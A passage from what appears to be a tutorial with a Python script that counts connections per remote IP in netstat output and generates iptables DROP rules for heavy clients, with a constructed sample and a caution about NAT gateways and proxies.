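    (a busy but legitimate proxy looks exactly like an abuser here)."""
    return [f"iptables -A INPUT -s {ip} -j DROP"
            for ip, _ in over_threshold(netstat_output, limit)]


# Constructed sample of `netstat -an` output: one ssh session, three web
# connections from a mapped-IPv4 client, one IPv6 client, one TIME_WAIT.
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.2.15:22            10.0.2.1:53924          ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN
tcp6       0      0 ::ffff:10.0.2.15:80     ::ffff:198.51.100.9:40001 ESTABLISHED
tcp6       0      0 ::ffff:10.0.2.15:80     ::ffff:198.51.100.9:40002 ESTABLISHED
tcp6       0      0 ::ffff:10.0.2.15:80     ::ffff:198.51.100.9:40003 ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::1:50200       ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::1:50201       TIME_WAIT
udp        0      0 0.0.0.0:68              0.0.0.0:*
"""

if __name__ == "__main__":
    for ip, n in connections_per_ip(SAMPLE).most_common():
        print(f"{n:4d} {ip}")
    print(drop_rules(SAMPLE, limit=2))
```

On a live host pipe `netstat -an` into it (`connections_per_ip(sys.stdin.read())`), or read `ss -tan`, whose columns differ only in the first field. The threshold is the part that needs judgement: count per remote address over a few minutes before deciding that a high number is abuse rather than a NAT gateway with many users behind it.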